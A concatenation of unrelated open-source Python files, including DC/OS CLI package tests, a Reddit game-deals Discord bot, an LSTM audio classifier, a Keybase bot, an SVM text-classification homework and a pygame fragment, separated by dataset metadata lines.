cli-test-3.zip",
"postInstallNotes": "A sample post-installation message",
"preInstallNotes": "A sample pre-installation message",
"releaseVersion": "0",
"tags": [
"mesosphere",
"example",
"subcommand"
],
"version": "0.1.0",
"website": "https://github.com/mesosphere/dcos-helloworld"
}
]
"""
_list(stdout=stdout)
_uninstall_helloworld()
def test_uninstall_multiple_frameworknames(zk_znode):
_install_chronos(
args=['--yes', '--options=tests/data/package/chronos-1.json'])
_install_chronos(
args=['--yes', '--options=tests/data/package/chronos-2.json'])
watch_all_deployments()
expected_output = _chronos_description(
['/chronos-user-1', '/chronos-user-2'])
_list(stdout=expected_output)
_list(args=['--json', 'chronos'], stdout=expected_output)
_list(args=['--json', '--app-id=/chronos-user-1'],
stdout=_chronos_description(['/chronos-user-1']))
_list(args=['--json', '--app-id=/chronos-user-2'],
stdout=_chronos_description(['/chronos-user-2']))
_uninstall_chronos(
args=['--app-id=chronos-user-1'],
returncode=1,
stderr='Uninstalled package [chronos] version [2.4.0]\n'
'The Chronos DCOS Service has been uninstalled and will no '
'longer run.\nPlease follow the instructions at http://docs.'
'mesosphere.com/services/chronos/#uninstall to clean up any '
'persisted state\n'
'Unable to shutdown the framework for [chronos-user] because '
'there are multiple frameworks with the same name: ')
_uninstall_chronos(
args=['--app-id=chronos-user-2'],
returncode=1,
stderr='Uninstalled package [chronos] version [2.4.0]\n'
'The Chronos DCOS Service has been uninstalled and will no '
'longer run.\nPlease follow the instructions at http://docs.'
'mesosphere.com/services/chronos/#uninstall to clean up any '
'persisted state\n'
'Unable to shutdown the framework for [chronos-user] because '
'there are multiple frameworks with the same name: ')
for framework in get_services(args=['--inactive']):
if framework['name'] == 'chronos-user':
service_shutdown(framework['id'])
def test_search():
returncode, stdout, stderr = exec_command(
['dcos', 'package', 'search', 'cron', '--json'])
assert returncode == 0
assert b'chronos' in stdout
assert stderr == b''
returncode, stdout, stderr = exec_command(
['dcos', 'package', 'search', 'xyzzy', '--json'])
assert returncode == 0
assert b'"packages": []' in stdout
assert b'"source": "https://github.com/mesosphere/universe/archive/\
cli-test-3.zip"' in stdout
assert stderr == b''
returncode, stdout, stderr = exec_command(
['dcos', 'package', 'search', 'xyzzy'])
assert returncode == 1
assert b'' == stdout
assert stderr == b'No packages found.\n'
returncode, stdout, stderr = exec_command(
['dcos', 'package', 'search', '--json'])
registries = json.loads(stdout.decode('utf-8'))
for registry in registries:
        # assert that the number of packages is at least the number at the
        # time this test was written
assert len(registry['packages']) >= 5
assert returncode == 0
assert stderr == b''
def test_search_table():
returncode, stdout, stderr = exec_command(
['dcos', 'package', 'search'])
assert returncode == 0
assert b'chronos' in stdout
assert len(stdout.decode('utf-8').split('\n')) > 5
assert stderr == b''
def test_search_ends_with_wildcard():
returncode, stdout, stderr = exec_command(
['dcos', 'package', 'search', 'c*', '--json'])
assert returncode == 0
assert b'chronos' in stdout
assert b'cassandra' in stdout
assert stderr == b''
registries = json.loads(stdout.decode('utf-8'))
for registry in registries:
assert len(registry['packages']) == 2
def test_search_start_with_wildcard():
returncode, stdout, stderr = exec_command(
['dcos', 'package', 'search', '*nos', '--json'])
assert returncode == 0
assert b'chronos' in stdout
assert stderr == b''
registries = json.loads(stdout.decode('utf-8'))
for registry in registries:
assert len(registry['packages']) == 1
def test_search_middle_with_wildcard():
returncode, stdout, stderr = exec_command(
['dcos', 'package', 'search', 'c*s', '--json'])
assert returncode == 0
assert b'chronos' in stdout
assert stderr == b''
registries = json.loads(stdout.decode('utf-8'))
for registry in registries:
assert len(registry['packages']) == 1
@patch('dcos.package.Package.package_json')
@patch('dcos.package.Package.config_json')
def test_bad_config_schema_msg(config_mock, package_mock):
pkg = package.Package("", "/")
config_mock.return_value = {}
package_mock.return_value = {'maintainer': '<EMAIL>'}
with pytest.raises(DCOSException) as e:
pkg.options("1", {})
msg = ("An object in the package's config.json is missing the "
"required 'properties' feature:\n {}"
"\nPlease contact the project maintainer: <EMAIL>")
assert e.exconly().split(':', 1)[1].strip() == msg
def _get_app_labels(app_id):
returncode, stdout, stderr = exec_command(
['dcos', 'marathon', 'app', 'show', app_id])
assert returncode == 0
assert stderr == b''
app_json = json.loads(stdout.decode('utf-8'))
return app_json.get('labels')
def _install_helloworld(
args=['--yes'],
stdout=b'A sample pre-installation message\n'
b'Installing Marathon app for package [helloworld] '
b'version [0.1.0]\n'
b'Installing CLI subcommand for package [helloworld] '
b'version [0.1.0]\n'
b'New command available: dcos helloworld\n'
b'A sample post-installation message\n',
returncode=0,
stdin=None):
assert_command(
['dcos', 'package', 'install', 'helloworld'] + args,
stdout=stdout,
returncode=returncode,
stdin=stdin)
def _uninstall_helloworld(
args=[],
stdout=b'',
stderr=b'',
returncode=0):
assert_command(['dcos', 'package', 'uninstall', 'helloworld'] + args,
stdout=stdout,
stderr=stderr,
returncode=returncode)
def _uninstall_chronos(args=[], returncode=0, stdout=b'', stderr=''):
result_returncode, result_stdout, result_stderr = exec_command(
['dcos', 'package', 'uninstall', 'chronos'] + args)
assert result_returncode == returncode
assert result_stdout == stdout
assert result_stderr.decode('utf-8').startswith(stderr)
def _install_chronos(
args=['--yes'],
returncode=0,
stdout=b'Installing Marathon app for package [chronos] '
b'version [2.4.0]\n',
stderr=b'',
preInstallNotes=b'We recommend a minimum of one node with at least 1 '
b'CPU and 2GB of RAM available for the Chronos '
b'Service.\n',
postInstallNotes=b'Chronos DCOS Service has been successfully '
b'''installed!
\tDocumentation: http://mesos.github.io/chronos
\tIssues: https://github.com/mesos/chronos/issues\n''',
stdin=None):
cmd = ['dcos', 'package', 'install', 'chronos'] + args
assert_command(
cmd,
returncode,
preInstallNotes + stdout + postInstallNotes,
stderr,
stdin=stdin)
def _list(args=['--json'],
stdout=b'[]\n'):
assert_command(['dcos', 'package', 'list'] + args,
stdout=stdout)
def _helloworld():
stdout = b'''A sample pre-installation message
Installing Marathon app for package [helloworld] version [0.1.0]
Installing CLI subcommand for package [helloworld] version [0.1.0]
New command available: dcos helloworld
A sample post-installation message
'''
return _package('helloworld',
stdout=stdout)
@contextlib.contextmanager
def _package(name,
stdout=b'',
uninstall_stderr=b'',
args=['--yes']):
"""Context manager that installs a package on entrace, and uninstalls it on
exit.
:param name: package name
:type name: str
:param stdout: Expected stdout
:type stdout: str
:param uninstall_stderr: Expected stderr
:type uninstall_stderr: str
:param args: extra CLI args
:type args: [str]
:rtype: None
"""
assert_command(['dcos', 'package', 'install', name] + args,
stdout=stdout)
try:
yield
finally:
assert_command(
['dcos', 'package', 'uninstall', name],
stderr=uninstall_stderr)
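# Illustrative usage sketch (not part of the original test module): the _package
# context manager above installs a package on entrance and uninstalls it on exit,
# so a test body can be wrapped like this (the expected stdout is a placeholder):
#
# def test_with_temporary_package():
#     with _package('helloworld', stdout=b'...expected install output...'):
#         assert_lines(['dcos', 'package', 'list'], 2)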
| 1.796875
| 2
|
cogs/reddit/gamedeals.py
|
santoshpanna/Discord-Bot
| 0
|
12783866
|
import praw, os, discord, requests
from steamstorefront import SteamStoreFront
from datetime import datetime
from collections import deque
from bs4 import BeautifulSoup
from common import common, database
from ..helpers import steam, gamedeals, guild
from ..helpers.gamedeals import isFromAcceptableStore
class GameDeals:
r = None
steam = None
    # constructor to initialize variables
def __init__(self):
config = common.getConfig()
self.masterLogger = common.getMasterLog()
self.r = praw.Reddit(client_id=config['REDDIT']['client.id'], client_secret=config['REDDIT']['client.secret'], user_agent=config['REDDIT']['user.agent'])
self.steam = steam.Steam()
self.ssf = SteamStoreFront()
# get new results
def getSubreddit(self, subreddit, limit):
rsub = self.r.subreddit(subreddit)
res = rsub.new(limit=limit)
return res
def keyDoesNotExists(self, deq, dict):
for el in deq:
if el['url'] == dict['url']:
return False
return True
async def run(self, bot):
masterLogger = common.getMasterLog()
db = database.Database()
# subreddits to fetch
subreddits = ['gamedeals', 'steamdeals', 'freegamefindings']
# final post container of non existing and distinct deals
enriched_post = deque()
# for each subreddit
for subreddit in subreddits:
# get the service record
service = db.getService(subreddit)
if 'latest' not in service:
service['latest'] = None
# get the latest submissions
posts = []
try:
posts = self.getSubreddit(subreddit, 30)
except Exception:
await bot.get_channel(masterLogger).send(f"**Error** : unable to fetch r/{subreddit}")
# id container
id = None
if common.getEnvironment() == 'dev':
# post log in masterlogger
await bot.get_channel(masterLogger).send(f"scraped {subreddit}.")
# iterate through posts
for post in posts:
# this is done for getting the first id
if not id:
id = post.id
# if there are no new post, break
if post.id == service['latest']:
break
if isFromAcceptableStore(post):
deal = {}
deal['title'] = post.title
deal['id'] = post.id
if "reddit.com" in post.url:
deal['url'] = gamedeals.getStoreLink(post)
else:
deal['url'] = gamedeals.removeURI(post.url)
deal['created'] = common.getTimeFromTimestamp(post.created)
if 'url' in deal and deal['url']:
# check if its steam store link
if 'steampowered.com' in deal['url']:
price = None
try:
price = self.ssf.getPrice(url=deal['url'])
except InvalidArgument as e:
if common.getEnvironment() == 'prod' or common.getEnvironment() == 'dev':
await bot.get_channel(masterLogger).send(f"error getting price for {deal['url']} of reddit id {deal['id']}. Arguments passed {e.error}, error type {e.type}.")
pass
if price:
deal['price'] = price['final']
if self.keyDoesNotExists(enriched_post, deal):
enriched_post.appendleft(deal)
# update database
data = {}
data["name"] = subreddit
if len(enriched_post) > 0:
data["lastposted"] = common.getDatetimeIST()
if id:
data["latest"] = id
status = db.upsertService(data)
if status == common.STATUS.SUCCESS.INSERTED:
await bot.get_channel(masterLogger).send(f"**Created Service**: {data['name']}.")
elif status == common.STATUS.FAIL.INSERT:
await bot.get_channel(masterLogger).send(f"**DB Insert Error - Service**: {data['name']}.")
elif status == common.STATUS.FAIL.UPDATE:
await bot.get_channel(masterLogger).send(f"**DB Update Error - Service**: {data['name']}.")
else:
pass
# send the final deque for posting
await self.send(enriched_post, bot)
# steam deals
async def send(self, posts, bot):
db = database.Database()
# go through new submissions
for post in posts:
status = db.upsertGameDeal(post)
# 1 = updated, 2 = created, -1 = error in update/inserting
channels = guild.getChannels('gamedeals')
for channel in channels:
# the deal already exists
if status == common.STATUS.SUCCESS.UPDATED:
# price check for steam games
if 'steampowered.com' in post['url']:
try:
existingDeal = db.getGameDeal(post)
new_price = self.ssf.getPrice(url=post['url'])
new_price = new_price['final'] if new_price else 9223372036854775806
if 'price' in existingDeal:
old_price = existingDeal['price']
# if new price is less than older price post the deal
if int(new_price) < int(old_price):
await self.steam.post(bot, channel, post)
# can't compare price, so leave the deal
except InvalidArgument as e:
if common.getEnvironment() == 'prod' or common.getEnvironment() == 'dev':
await bot.get_channel(common.getMasterLog()).send(f"error getting price for {post['url']} of reddit id {post['id']}. Arguments passed {e.error}, error type {e.type}.")
pass
# else:
# await self.steam.post(bot, channel, post)
# the deal is a new one
elif status == common.STATUS.SUCCESS.INSERTED:
# special handler for steam
if 'steampowered.com' in post['url']:
await self.steam.post(bot, channel, post)
else:
await bot.get_channel(channel['channel_id']).send(post['url'])
# if logging is enabled post log
if 'logging' in channel:
await bot.get_channel(channel['logging']).send(f"sent {post['title']} in {channel['channel_name']}")
# there has been error updating or inserting deal
else:
# log it in master log
                    await bot.get_channel(self.masterLogger).send(f"**DB Error**: Failed Updating/Inserting {post['id']}.")
| 2.59375
| 3
|
examples/settings.py
|
fakegit/googlevoice-1
| 156
|
12783867
|
import pprint
from googlevoice import Voice
def run():
voice = Voice()
voice.login()
pprint.pprint(voice.settings)
__name__ == '__main__' and run()
| 1.914063
| 2
|
models/Simple_LSTM.py
|
Pheithar/Animal-Sounds
| 1
|
12783868
|
<filename>models/Simple_LSTM.py<gh_stars>1-10
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data import DataLoader
from tqdm import tqdm
import torchvision
import torchvision.transforms as transforms
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.metrics import accuracy_score
from . import utils
class SimpleLSTM(nn.Module):
# Init
def __init__(self, net_arch: dict):
super(SimpleLSTM, self).__init__()
input_size = net_arch["input_size"]
hidden_size = net_arch["hidden_size"]
num_layers = net_arch["num_layers"]
lstm_dropout = net_arch["lstm_dropout"]
assert len(net_arch["linear_features"]) == 1 + len(net_arch["linear_dropout"]),\
f"Lenght of linear features ({len(net_arch['linear_features'])})"\
f" must be one more than the the lenght of linear dropout"\
f" ({len(net_arch['linear_dropout'])})."
self.lstm = nn.LSTM(input_size, hidden_size, num_layers, batch_first=True,
dropout=lstm_dropout)
# Layers - Linear
self.dense = nn.ModuleList()
self.ldrop = nn.ModuleList()
# Flatten
input_channels = hidden_size
for linear_features in net_arch["linear_features"]:
layer = nn.Linear(input_channels, linear_features)
self.dense.append(layer)
# Update parameters
input_channels = linear_features
for drop in net_arch["linear_dropout"]:
self.ldrop.append(nn.Dropout(drop))
# Activation
self.relu = nn.ReLU()
self.last_activation = eval("nn." + net_arch["last_layer_activation"])
def forward(self, x):
x, _ = self.lstm(x)
x = x[:, -1]
for dense, dropout in zip(self.dense, self.ldrop):
x = dense(x)
x = self.relu(x)
x = dropout(x)
x = self.last_activation(self.dense[-1](x))
return x
def fit(self, num_epochs: int, train_loader: DataLoader,
validation_loader: DataLoader,
criterion, optimizer,
show: bool = True, frequency_val : int = 2,
log_file: str = None, plot_file: str = None,
train_name: str = "Network"):
sns.set()
if log_file:
with open(log_file, "a") as f:
f.write(train_name + "\n")
train_loss = []
train_acc = []
plot_epochs_train = []
val_loss = []
val_acc = []
plot_epochs_val = []
fig, (loss_ax, acc_ax) = plt.subplots(2, 1, figsize=(12, 10))
for epoch in tqdm(range(num_epochs), desc=f"Training {train_name}"):
running_loss = 0.0
running_accuracy = 0.0
# State that the network is in train mode
self.train()
for i, data in enumerate(train_loader):
# Get the inputs
val = data
inputs, labels = val["mfcc"], val["label"]
inputs = utils.get_cuda(inputs)
labels = utils.get_cuda(labels)
# Make them variables
optimizer.zero_grad()
# Forward, backward and around
outputs = self(inputs)
# print(outputs.shape, labels.shape)
loss = criterion(outputs, labels)
loss.backward()
optimizer.step()
labels = utils.get_numpy(self.compute_prediction(labels))
outputs = utils.get_numpy(self.compute_prediction(outputs))
running_accuracy += accuracy_score(outputs, labels)
running_loss += loss.data.item()
train_loss.append(running_loss / len(train_loader))
train_acc.append(running_accuracy / len(train_loader))
plot_epochs_train.append(epoch+1)
if epoch % frequency_val == 0 or epoch == num_epochs-1:
running_loss = 0.0
running_accuracy = 0.0
# State that the network is in validation mode
self.eval()
for i, data in enumerate(validation_loader):
# Get the inputs
val = data
inputs, labels = val["mfcc"], val["label"]
inputs = utils.get_cuda(inputs)
labels = utils.get_cuda(labels)
outputs = self(inputs)
loss = criterion(outputs, labels)
labels = utils.get_numpy(self.compute_prediction(labels))
outputs = utils.get_numpy(self.compute_prediction(outputs))
running_accuracy += accuracy_score(outputs, labels)
running_loss += loss.data.item()
val_loss.append(running_loss / len(validation_loader))
val_acc.append(running_accuracy / len(validation_loader))
plot_epochs_val.append(epoch+1)
if log_file:
with open(log_file, "a") as f:
f.write("-------------------------------------------\n")
f.write(f"Epoch {epoch+1}:\n")
f.write(f"\t Train Loss: {train_loss[-1]:.2f}\n")
f.write(f"\t Train Accuracy: {train_acc[-1]:.2f}\n")
f.write(f"\t Validation Loss: {val_loss[-1]:.2f}\n")
f.write(f"\t Validation Accuracy: {val_acc[-1]:.2f}\n")
step = max(int(len(plot_epochs_train) // 10), 1)
loss_ax.set_title("Loss function value in the train and validation sets")
loss_ax.plot(plot_epochs_train, train_loss, label="Train Loss")
loss_ax.plot(plot_epochs_val, val_loss, label="Validation Loss")
loss_ax.set_xlabel("Epochs")
loss_ax.set_ylabel("Value")
loss_ax.legend()
loss_ax.set_xticks(range(1, len(plot_epochs_train), step))
acc_ax.set_title("Accuracy of the train and validation sets")
acc_ax.plot(plot_epochs_train, train_acc, label="Train Accuracy")
acc_ax.plot(plot_epochs_val, val_acc, label="Validation Accuracy")
acc_ax.set_xlabel("Epochs")
acc_ax.set_ylabel("Percentage")
acc_ax.set_xticks(range(1, len(plot_epochs_train), step))
acc_ax.legend()
if plot_file:
plt.savefig(plot_file)
if show:
plt.show()
else:
plt.close()
return ((train_loss[-1], train_acc[-1]), (val_loss[-1], val_acc[-1]))
def compute_prediction(self, y):
if y.shape[1] == 1:
return y.int()
return torch.max(y, 1)[1]
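# Illustrative construction sketch (not part of the original file). The key names
# follow the net_arch dict read in __init__ above; the concrete values here are
# hypothetical placeholders.
#
# example_arch = {
#     "input_size": 40, "hidden_size": 128, "num_layers": 2, "lstm_dropout": 0.2,
#     "linear_features": [64, 5],   # one more entry than linear_dropout
#     "linear_dropout": [0.3],
#     "last_layer_activation": "Softmax(dim=1)",
# }
# model = SimpleLSTM(example_arch)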
| 2.5625
| 3
|
examples/1_clap_for_everything.py
|
InnovativeInventor/pykeybasebot
| 117
|
12783869
|
<reponame>InnovativeInventor/pykeybasebot<gh_stars>100-1000
#!/usr/bin/env python3
###################################
# WHAT IS IN THIS EXAMPLE?
#
# This bot listens in one channel and reacts to every text message.
###################################
import asyncio
import logging
import os
import sys
import pykeybasebot.types.chat1 as chat1
from pykeybasebot import Bot
logging.basicConfig(level=logging.DEBUG)
if "win32" in sys.platform:
# Windows specific event-loop policy
asyncio.set_event_loop_policy(
asyncio.WindowsProactorEventLoopPolicy() # type: ignore
)
async def handler(bot, event):
if event.msg.content.type_name != chat1.MessageTypeStrings.TEXT.value:
return
channel = event.msg.channel
msg_id = event.msg.id
await bot.chat.react(channel, msg_id, ":clap:")
listen_options = {"filter-channel": {"name": "yourbot,someoneelse"}}
bot = Bot(username="yourbot", paperkey=os.environ["KEYBASE_PAPERKEY"], handler=handler)
asyncio.run(bot.start(listen_options))
| 2.75
| 3
|
RegionMap-datagen.py
|
derrickmehaffy/EliteDangerousRegionMap
| 8
|
12783870
|
#!/bin/env python3
from PIL import Image
from numpy import asarray
import json
regionmap = asarray(Image.open('RegionMap.png'))
region1 = 42 * 4
regions = [
None,
"Galactic Centre",
"Empyrean Straits",
"Ryker's Hope",
"Odin's Hold",
"Norma Arm",
"Arcadian Stream",
"Izanami",
"Inner Orion-Perseus Conflux",
"Inner Scutum-Centaurus Arm",
"Norma Expanse",
"Trojan Belt",
"The Veils",
"Newton's Vault",
"The Conduit",
"Outer Orion-Perseus Conflux",
"Orion-Cygnus Arm",
"Temple",
"Inner Orion Spur",
"Hawking's Gap",
"Dryman's Point",
"Sagittarius-Carina Arm",
"<NAME>",
"Acheron",
"Formorian Frontier",
"Hieronymus Delta",
"Outer Scutum-Centaurus Arm",
"Outer Arm",
"Aquila's Halo",
"Errant Marches",
"Perseus Arm",
"Formidine Rift",
"Vulcan Gate",
"Elysian Shore",
"Sanguineous Rim",
"Outer Orion Spur",
"Achilles's Altar",
"Xibalba",
"Lyra's Song",
"Tenebrae",
"The Abyss",
"Kepler's Crest",
"The Void"
]
lines = []
for l in regionmap[::-1]:
rle = []
p = 0
n = 0
for px in l:
px = 0 if px == 0 else (region1 - px) // 4 + 1
if px != p:
rle.append((n, p))
p = px
n = 1
else:
n += 1
rle.append((n, p))
lines.append(rle)
with open('RegionMapData.py', 'wt') as f:
f.write('#!/bin/env python3\n')
f.write('\n')
f.write('regions = [\n')
for r in regions:
f.write(' {0},\n'.format(repr(r)))
f.write(']\n')
f.write('\n')
f.write('regionmap = [\n')
for l in lines:
f.write(' {0},\n'.format(repr(l)))
f.write(']\n')
f.write('\n')
with open('RegionMapData.json', 'wt') as f:
f.write('{\n')
f.write(' "regions": [\n')
f.write(' {0}\n'.format(',\n '.join(json.dumps(r) for r in regions)))
f.write(' ],\n')
f.write(' "regionmap": [\n');
f.write(' {0}\n'.format(',\n '.join(json.dumps([[int(rl), int(rv)] for rl, rv in l]) for l in lines)))
f.write(' ]\n')
f.write('}\n')
with open('RegionMapData.cs', 'wt') as f:
f.write('namespace EliteDangerousRegionMap\n')
f.write('{\n')
f.write(' public static partial class RegionMap\n')
f.write(' {\n')
f.write(' private static string[] RegionNames = new[]\n')
f.write(' {\n')
for r in regions:
f.write(' {0},\n'.format(json.dumps(r)))
f.write(' };\n')
f.write('\n')
f.write(' private static (int, int)[][] RegionMapLines = new[]\n')
f.write(' {\n')
for row in lines:
f.write(' new[]{' + ','.join(repr((l, v)) for l, v in row) + '},\n')
f.write(' };\n')
f.write(' }\n')
f.write('}\n')
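# Illustrative sketch (not part of the original script): each entry of `lines` is
# a run-length encoding of one scanline as (run_length, region_index) pairs, so a
# row can be expanded back into per-pixel region indices like this:
#
# def decode_row(rle):
#     pixels = []
#     for run_length, region_index in rle:
#         pixels.extend([region_index] * run_length)
#     return pixels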
| 2.46875
| 2
|
biblescrapeway/cli.py
|
jonathanvanschenck/biblescrapeway
| 0
|
12783871
|
import click
import json
from pathlib import Path
from .query import query
CONTEXT_SETTINGS = dict(help_option_names=['-h', '--help'])
def _format_line(obj, _format):
if _format == 'refstr':
return obj.to_string()
if _format == 'str':
return '`{}` ({})'.format(obj.text,obj.version)
def _formatter(obj_list, _format):
# Handle json
if _format == 'json':
return json.dumps([v.to_dict() for v in obj_list],indent=4)
# Handle everything else
return "\n".join([_format_line(obj,_format) for obj in obj_list])
@click.command(context_settings=CONTEXT_SETTINGS)
@click.option('--version', '-v', default='ESV', help='Bible version to query, default is `ESV`')
@click.option('--format', '-f', '_format', default='refstr', type=click.Choice(['refstr','str','json']),
help='Specify output format, default is `refstr`')
@click.option('--cache/--no-cache', default=False,
help='Look up verses saved in a local cache first, and save new queries locally')
@click.argument('reference_string')
def scrap(version, reference_string, _format, cache):
"""Scrap bible verses
REFERENCE_STRING a (comma delimited) list of references, e.g. `John3.16` or `1Peter3.1-5` or `Gen1,2`
"""
verses = query( reference_string, version, cache )
click.echo(_formatter(verses, _format))
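# Illustrative invocations (not part of the original module); these assume the
# package exposes the `scrap` command above as its console entry point:
#
#   scrap "John3.16"
#   scrap --version ESV --format json "1Peter3.1-5,Gen1"
#   scrap --cache "Gen1,2"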
| 2.5
| 2
|
final report/svm.py
|
core-not-dumped/Introduction_to_Artificial_Intelligence
| 0
|
12783872
|
# -*- coding: utf-8 -*-
from hw7_util import *
class Preprocessing(AI_util):
def Calculate_Binary(self, data: List[Tuple[str, List[str], int]]) -> List[Tuple[str, List[float], int]]:
"""
*** You should implement this function with raw code ***
*** When you code, you have to erase this comment ***
(input) 'data' type : List[Tuple[str, List[str], int]]
(input) 'data' format : [(document id, tokenized text, category index)]
(output) return type : List[Tuple[str, List[float], int]]
(output) return format : [(document id, Binary vector, category index)]
"""
binary_all = list()
for (list_id,tokenized_text,cate) in data:
binary_tmp = list(0 for i in range(len(self.word2idx)))
for append_word in tokenized_text:
if append_word in self.word2idx.keys():
binary_tmp[self.word2idx[append_word]] = 1
binary = (list_id, binary_tmp, cate)
binary_all.append(binary)
return binary_all
def Calculate_TF(self, data: List[Tuple[str, List[str], int]]) -> List[Tuple[str, List[float], int]]:
"""
*** You should implement this function with raw code ***
*** When you code, you have to erase this comment ***
(input) 'data' type : List[Tuple[str, List[str], int]]
(input) 'data' format : [(document id, tokenized text, category index)]
(output) return type : List[Tuple[str, List[float], int]]
(output) return format : [(document id, TF, category index)]
"""
tf_all = list()
for (list_id,tokenized_text,cate) in data:
tf_tmp = list(0 for i in range(len(self.word2idx)))
for append_word in tokenized_text:
if append_word in self.word2idx.keys():
tf_tmp[self.word2idx[append_word]] += 1
tf = (list_id,tf_tmp,cate)
tf_all.append(tf)
return tf_all
def Calculate_TF_IDF_Normalization(self, data: List[Tuple[str, List[str], int]], data_type: str) -> List[Tuple[str, List[float], int]]:
"""
*** You should implement this function with raw code ***
*** When you code, you have to erase this comment ***
(input) 'data' type : List[Tuple[str, List[str], int]]
(input) 'data' format : [(document id, tokenized text, category index)]
(output) return type : List[Tuple[str, List[float], int]]
(output) return format : [(document id, normalized tf-idf, category index)]
"""
tf = list()
for (list_id,tokenized_text,cate) in data:
tf_tmp = list(0 for i in range(len(self.word2idx)))
for append_word in tokenized_text:
if append_word in self.word2idx.keys():
tf_tmp[self.word2idx[append_word]] += 1
tf.append(tf_tmp)
if len(data)>200:
self.idf = list(0 for i in range(len(self.word2idx)))
for (list_id,tokenized_text,cate) in data:
idf_tmp = list(0 for i in range(len(self.word2idx)))
for append_word in tokenized_text:
if append_word in self.word2idx.keys():
idf_tmp[self.word2idx[append_word]] = 1
for i in range(len(self.word2idx)):
self.idf[i] += idf_tmp[i]
for i in range(len(self.word2idx)):
self.idf[i] = math.log(float(len(data))/float(self.idf[i]),2)
tfidf_all = list()
for i in range(len(tf)):
tfidf_tmp = list(0 for j in range(len(self.word2idx)))
tfidf_sqare_sum_tmp = 0
for j in range(len(self.word2idx)):
tfidf_tmp[j] = tf[i][j] * self.idf[j]
tfidf_sqare_sum_tmp += (tfidf_tmp[j] * tfidf_tmp[j])
for j in range(len(self.word2idx)):
tfidf_tmp[j] = tfidf_tmp[j] / math.sqrt(tfidf_sqare_sum_tmp)
tfidf = (data[i][0], tfidf_tmp, data[i][2])
if i == 0:
print(tfidf)
tfidf_all.append(tfidf)
return tfidf_all
def main(data, label2idx):
std_name = "이승태"
std_id = "2017313107"
result = dict()
for inp_type, tr, te in tqdm(data, desc='training & evaluating...'):
"""
This function is for training and evaluating (testing) SVM Model.
"""
### EDIT HERE ###
train_inputs = list()
train_label = list()
test_inputs = list()
test_label = list()
for i in range(len(tr)):
train_inputs.append(tr[i][1])
train_label.append(tr[i][2])
for i in range(len(te)):
test_inputs.append(te[i][1])
test_label.append(te[i][2])
classifier = LinearSVC(C=1.0,max_iter=1000)
classifier.fit(train_inputs, train_label)
prediction = classifier.predict(test_inputs)
result[inp_type] = dict()
accur_map = np.zeros((5,5))
accuracy = 0.0
number_of_docs = np.zeros(5)
for i in range(len(te)):
number_of_docs[test_label[i]] += 1
accur_map[prediction[i]][test_label[i]] += 1
if prediction[i] == test_label[i]:
accuracy += 1
accuracy = accuracy / len(te)
print('accuracy:')
print(accuracy)
micro_map = np.zeros((2,2))
precision = np.zeros(5)
recall = np.zeros(5)
label = {0:'entertainment',1:'finance',2:'lifestyle',3:'sports',4:'tv'}
for i in range(5):
TP = accur_map[i][i]
FN = 0.0
FP = 0.0
for j in range(5):
if i==j:
continue
FP += accur_map[i][j]
for j in range(5):
if i==j:
continue
FN += accur_map[j][i]
micro_map[0][0] += TP
micro_map[0][1] += FN
micro_map[1][0] += FP
precision[i] = TP / (FP + TP)
recall[i] = TP / (FN + TP)
f1 = 2 * precision[i] * recall[i] / (precision[i] + recall[i])
result[inp_type][label[i]] = (precision[i] * 100, recall[i] * 100, f1 * 100, number_of_docs[i])
result[inp_type]['accuracy'] = (accuracy * 100, np.sum(number_of_docs))
pre = micro_map[0][0] / (micro_map[0][0] + micro_map[1][0])
re = micro_map[0][0] / (micro_map[0][0] + micro_map[0][1])
f1 = 2 * pre * re / (pre + re)
result[inp_type]['micro avg'] = (pre * 100, re * 100, f1 * 100, np.sum(number_of_docs))
pre = np.sum(precision)/5
re = np.sum(recall)/5
result[inp_type]['macro avg'] = (pre * 100, re * 100, f1 * 100, np.sum(number_of_docs))
print(result)
### END ###
"""
result(input variable for "save_result" function) contains
1. Performance for each labels (precision, recall, f1-score per label)
2. Overall micro/macro average and accuracy for the entire test dataset
3. Convert the result 1 and 2 into percentages by multiplying 100
result type : Dict[str, Dict[str, Union[Tuple[float, float, float, int], Tuple[float, int]]]]
result input format for "save_result" function:
{
'Binary':
{
"entertainment": (precision, recall, f1-score, # of docs),
"finance": (precision, recall, f1-score, # of docs),
"lifestyle": (precision, recall, f1-score, # of docs),
"sports": (precision, recall, f1-score, # of docs),
"tv": (precision, recall, f1-score, # of docs),
"accuracy": (accuracy, total docs),
"micro avg": (precision, recall, f1-score, total docs),
"macro avg": (precision, recall, f1-score, total docs)
},
"TF": ...,
"TF-IDF": ...,
}
"""
save_result(result, std_name=std_name, std_id=std_id)
if __name__ == "__main__":
# *** Do not modify the code below ***
random.seed(42)
np.random.seed(42)
Preprocessing = Preprocessing()
tr_data = Preprocessing.load_data(data_path='./train.json', data_type='train')
Preprocessing.tr_binary = Preprocessing.Calculate_Binary(data=tr_data)
Preprocessing.tr_tf = Preprocessing.Calculate_TF(data=tr_data)
Preprocessing.tr_tfidf = Preprocessing.Calculate_TF_IDF_Normalization(data=tr_data, data_type='train')
te_data = Preprocessing.load_data(data_path='./test.json', data_type='test')
Preprocessing.te_binary = Preprocessing.Calculate_Binary(data=te_data)
Preprocessing.te_tf = Preprocessing.Calculate_TF(data=te_data)
Preprocessing.te_tfidf = Preprocessing.Calculate_TF_IDF_Normalization(data=te_data, data_type='test')
data = [
('Binary', Preprocessing.tr_binary, Preprocessing.te_binary),
('TF', Preprocessing.tr_tf, Preprocessing.te_tf),
('TF-IDF', Preprocessing.tr_tfidf, Preprocessing.te_tfidf)
]
main(data, Preprocessing.label2idx)
# *** Do not modify the code above ***
| 3.265625
| 3
|
numba/cuda/tests/cudapy/test_cuda_autojit.py
|
meawoppl/numba
| 1
|
12783873
|
<gh_stars>1-10
from __future__ import print_function
from numba import unittest_support as unittest
from numba import cuda
import numpy as np
class TestCudaAutojit(unittest.TestCase):
def test_device_array(self):
@cuda.autojit
def foo(x, y):
i = cuda.grid(1)
y[i] = x[i]
x = np.arange(10)
y = np.empty_like(x)
dx = cuda.to_device(x)
dy = cuda.to_device(y)
foo[10, 1](dx, dy)
dy.copy_to_host(y)
self.assertTrue(np.all(x == y))
if __name__ == '__main__':
unittest.main()
| 2.4375
| 2
|
level_3/module/ghost_module.py
|
yogeshwari-vs/2D-Paramotoring-Pygame
| 2
|
12783874
|
import os
import pygame
import random
from level_3.module import background_module
from level_3.module import foreground_module
from level_3.module import player_module
class Ghost():
"""
Describes ghost obstacles.
"""
# Loading ghost images
num_of_imgs = 6
list_of_lists = []
path = r'level_3/Utils/Pics/Ghost/'
